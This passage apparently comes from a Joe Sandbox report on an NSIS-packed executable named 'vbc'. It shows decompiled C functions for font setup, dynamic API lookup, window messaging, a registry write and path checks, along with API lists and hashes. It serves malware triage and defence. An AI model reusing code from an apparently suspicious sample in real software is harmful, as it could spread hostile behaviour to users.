                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                    • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                    • Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                    • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00401E4E(intOrPtr __edx) {
                    				void* __edi;
                    				int _t9;
                    				signed char _t15;
                    				struct HFONT__* _t18;
                    				intOrPtr _t30;
                    				void* _t31;
                    				struct HDC__* _t33;
                    				void* _t35;
                    
                    				_t30 = __edx;
                    				_t33 = GetDC( *(_t35 - 8));
                    				_t9 = E00402D84(2);
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                    				ReleaseDC( *(_t35 - 8), _t33);
                    				 *0x40cdd8 = E00402D84(3);
                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				 *0x40cddf = 1;
                    				 *0x40cddc = _t15 & 0x00000001;
                    				 *0x40cddd = _t15 & 0x00000002;
                    				 *0x40cdde = _t15 & 0x00000004;
                    				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                    				_t18 = CreateFontIndirectW(0x40cdc8);
                    				_push(_t18);
                    				_push(_t31);
                    				E00406461();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}

                    0x00401e4e
                    0x00401e59
                    0x00401e5b
                    0x00401e68
                    0x00401e7f
                    0x00401e84
                    0x00401e91
                    0x00401e96
                    0x00401e9a
                    0x00401ea5
                    0x00401eac
                    0x00401ebe
                    0x00401ec4
                    0x00401ec9
                    0x00401ed3
                    0x00402638
                    0x0040156d
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32 ref: 00401E73
                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                    • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                    • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                    • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E734F16BD(struct HINSTANCE__* _a4, short* _a8) {
                    				_Unknown_base(*)()* _t7;
                    				void* _t10;
                    				int _t14;
                    
                    				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                    				_t10 = GlobalAlloc(0x40, _t14);
                    				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                    				_t7 = GetProcAddress(_a4, _t10);
                    				GlobalFree(_t10);
                    				return _t7;
                    			}

                    0x734f16d7
                    0x734f16e3
                    0x734f16f0
                    0x734f16f7
                    0x734f1700
                    0x734f170c

                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16D5
                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16DC
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F0
                    • GetProcAddress.KERNEL32(734F22D8,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F7
                    • GlobalFree.KERNEL32(00000000), ref: 734F1700
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                    • String ID:
                    • API String ID: 1148316912-0
                    • Opcode ID: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
                    • Instruction ID: 81bc5ece0a6fb62c237e185f29be97b6922663b2ae160f259f95a576c2cda87e
                    • Opcode Fuzzy Hash: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
                    • Instruction Fuzzy Hash: 05F0A2731061397FD6212AA78C4CD9B7E9CDF8B2F5B150215F61CA129089615D11D7F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
                    				int _t29;
                    				long _t30;
                    				signed int _t32;
                    				WCHAR* _t35;
                    				long _t36;
                    				int _t41;
                    				signed int _t42;
                    				int _t46;
                    				int _t56;
                    				intOrPtr _t57;
                    				struct HWND__* _t63;
                    				void* _t64;
                    
                    				_t57 = __edx;
                    				_t29 = E00402D84(3);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 - 0x18) = _t29;
                    				_t30 = E00402D84(4);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 + 8) = _t30;
                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                    				}
                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                    					 *(_t64 + 8) = E00402DA6(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t61 = E00402DA6();
                    					_t32 = E00402DA6();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t35 =  ~( *_t31) & _t61;
                    					__eflags = _t35;
                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                    					goto L10;
                    				} else {
                    					_t63 = E00402D84();
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t41 = E00402D84(2);
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t56 =  *(_t64 - 0x1c) >> 2;
                    					if(__eflags == 0) {
                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                    						L10:
                    						 *(_t64 - 0x38) = _t36;
                    					} else {
                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                    					_push( *(_t64 - 0x38));
                    					E00406461();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
                    				return 0;
                    			}

                    Statement addresses (address column of the side-by-side code view): 0x00401c43, 0x00401c45, 0x00401c4c, 0x00401c4f, 0x00401c52, 0x00401c5c, 0x00401c60, 0x00401c63, 0x00401c6c, 0x00401c6c, 0x00401c6f, 0x00401c73, 0x00401c7c, 0x00401c7c, 0x00401c7f, 0x00401c83, 0x00401c85, 0x00401cda, 0x00401cdc, 0x00401ce7, 0x00401cf1, 0x00401cf4, 0x00401cf4, 0x00401cfd, 0x00000000, 0x00401c87, 0x00401c8e, 0x00401c90, 0x00401c93, 0x00401c99, 0x00401ca0, 0x00401ca3, 0x00401ccb, 0x00401d03, 0x00401d03, 0x00401ca5, 0x00401cb3, 0x00401cbb, 0x00401cbe, 0x00401cbe, 0x00401ca3, 0x00401d06, 0x00401d09, 0x00401d0f, 0x00402ba4, 0x00402ba4, 0x00402c2d, 0x00402c39

                    APIs
                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                    • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                    • Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                    • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                    				char _v68;
                    				char _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t44;
                    				signed int _t46;
                    				signed int _t50;
                    				signed int _t52;
                    				signed int _t53;
                    				signed int _t55;
                    
                    				_t23 = _a16;
                    				_t53 = _a12;
                    				_t44 = 0xffffffdc;
                    				if(_t23 == 0) {
                    					_push(0x14);
                    					_pop(0);
                    					_t24 = _t53;
                    					if(_t53 < 0x100000) {
                    						_push(0xa);
                    						_pop(0);
                    						_t44 = 0xffffffdd;
                    					}
                    					if(_t53 < 0x400) {
                    						_t44 = 0xffffffde;
                    					}
                    					if(_t53 < 0xffff3333) {
                    						_t52 = 0x14;
                    						asm("cdq");
                    						_t24 = 1 / _t52 + _t53;
                    					}
                    					_t25 = _t24 & 0x00ffffff;
                    					_t55 = _t24 >> 0;
                    					_t46 = 0xa;
                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                    				} else {
                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                    					_t50 = 0;
                    				}
                    				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                    				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
                    				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
                    				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                    				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
                    			}

                    Statement addresses (address column of the side-by-side code view): 0x00404d2c, 0x00404d31, 0x00404d39, 0x00404d3a, 0x00404d47, 0x00404d4f, 0x00404d50, 0x00404d52, 0x00404d54, 0x00404d56, 0x00404d59, 0x00404d59, 0x00404d60, 0x00404d66, 0x00404d66, 0x00404d6d, 0x00404d74, 0x00404d77, 0x00404d7a, 0x00404d7a, 0x00404d7e, 0x00404d8e, 0x00404d90, 0x00404d93, 0x00404d3c, 0x00404d3c, 0x00404d43, 0x00404d43, 0x00404d9b, 0x00404da6, 0x00404dbc, 0x00404dcd, 0x00404de9

                    APIs
                    • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                    • wsprintfW.USER32 ref: 00404DCD
                    • SetDlgItemTextW.USER32 ref: 00404DE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                    • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                    • Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                    • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                    				void* _t20;
                    				void* _t21;
                    				int _t24;
                    				int _t30;
                    				intOrPtr _t33;
                    				void* _t34;
                    				intOrPtr _t37;
                    				void* _t39;
                    				void* _t42;
                    
                    				_t42 = __eflags;
                    				_t33 = __edx;
                    				_t30 = __ebx;
                    				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                    				_t34 = __eax;
                    				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                    				 *(_t39 - 0x44) = E00402DA6(2);
                    				_t20 = E00402DA6(0x11);
                    				 *(_t39 - 4) = 1;
                    				_t21 = E00402E36(_t42, _t34, _t20, 2);
                    				 *(_t39 + 8) = _t21;
                    				if(_t21 != __ebx) {
                    					_t24 = 0;
                    					if(_t37 == 1) {
                    						E00402DA6(0x23);
                    						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
                    					}
                    					if(_t37 == 4) {
                    						 *0x40b5c8 = E00402D84(3);
                    						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                    						_t24 = _t37;
                    					}
                    					if(_t37 == 3) {
                    						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
                    					}
                    					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
                    						 *(_t39 - 4) = _t30;
                    					}
                    					_push( *(_t39 + 8));
                    					RegCloseKey();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                    				return 0;
                    			}

                    Statement addresses (address column of the side-by-side code view): 0x0040248a, 0x0040248a, 0x0040248a, 0x0040248a, 0x0040248d, 0x00402494, 0x0040249e, 0x004024a1, 0x004024aa, 0x004024b1, 0x004024b8, 0x004024bb, 0x004024c1, 0x004024cb, 0x004024cf, 0x004024da, 0x004024da, 0x004024e1, 0x004024eb, 0x004024f1, 0x004024f4, 0x004024f4, 0x004024f8, 0x00402504, 0x00402504, 0x0040251d, 0x0040251f, 0x0040251f, 0x00402522, 0x004025fd, 0x004025fd, 0x00402c2d, 0x00402c39

                    APIs
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024D5
                    • RegSetValueExW.ADVAPI32 ref: 00402515
                    • RegCloseKey.ADVAPI32(?), ref: 004025FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 2655323295-2005183556
                    • Opcode ID: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                    • Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
                    • Opcode Fuzzy Hash: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                    • Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00405EF1(void* __eflags, intOrPtr _a4) {
                    				int _t11;
                    				signed char* _t12;
                    				intOrPtr _t18;
                    				intOrPtr* _t21;
                    				signed int _t23;
                    
                    				E0040651A(0x7a4750, _a4);
                    				_t21 = E00405E94(0x7a4750);
                    				if(_t21 != 0) {
                    					E004067A1(_t21);
                    					if(( *0x7a8a78 & 0x00000080) == 0) {
                    						L5:
                    						_t23 = _t21 - 0x7a4750 >> 1;
                    						while(1) {
                    							_t11 = lstrlenW(0x7a4750);
                    							_push(0x7a4750);
                    							if(_t11 <= _t23) {
                    								break;
                    							}
                    							_t12 = E00406850();
                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                    								E00405E35(0x7a4750);
                    								continue;
                    							} else {
                    								goto L1;
                    							}
                    						}
                    						E00405DE9();
                    						return 0 | GetFileAttributesW(??) != 0xffffffff;
                    					}
                    					_t18 =  *_t21;
                    					if(_t18 == 0 || _t18 == 0x5c) {
                    						goto L1;
                    					} else {
                    						goto L5;
                    					}
                    				}
                    				L1:
                    				return 0;
                    			}

                    Statement addresses (address column of the side-by-side code view): 0x00405efd, 0x00405f08, 0x00405f0c, 0x00405f13, 0x00405f1f, 0x00405f2f, 0x00405f31, 0x00405f49, 0x00405f4a, 0x00405f51, 0x00405f52, 0x00000000, 0x00000000, 0x00405f35, 0x00405f3c, 0x00405f44, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00405f3c, 0x00405f54, 0x00000000, 0x00405f68, 0x00405f21, 0x00405f27, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00405f27, 0x00405f0e, 0x00000000

                    APIs
                      • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                      • Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 3248276644-675090325
                    • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                    • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                    • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                    • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405E94(WCHAR* _a4) {
                    				WCHAR* _t5;
                    				short* _t7;
                    				WCHAR* _t10;
                    				short _t11;
                    				WCHAR* _t12;
                    				void* _t14;
                    
                    				_t12 = _a4;
                    				_t10 = CharNextW(_t12);
                    				_t5 = CharNextW(_t10);
                    				_t11 =  *_t12;
                    				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                    					if(_t11 != 0x5c || _t12[1] != _t11) {
                    						L10:
                    						return 0;
                    					} else {
                    						_t14 = 2;
                    						while(1) {
                    							_t14 = _t14 - 1;
                    							_t7 = E00405E16(_t5, 0x5c);
                    							if( *_t7 == 0) {
                    								goto L10;
                    							}
                    							_t5 = _t7 + 2;
                    							if(_t14 != 0) {
                    								continue;
                    							}
                    							return _t5;
                    						}
                    						goto L10;
                    					}
                    				} else {
                    					return CharNextW(_t5);
                    				}
                    			}

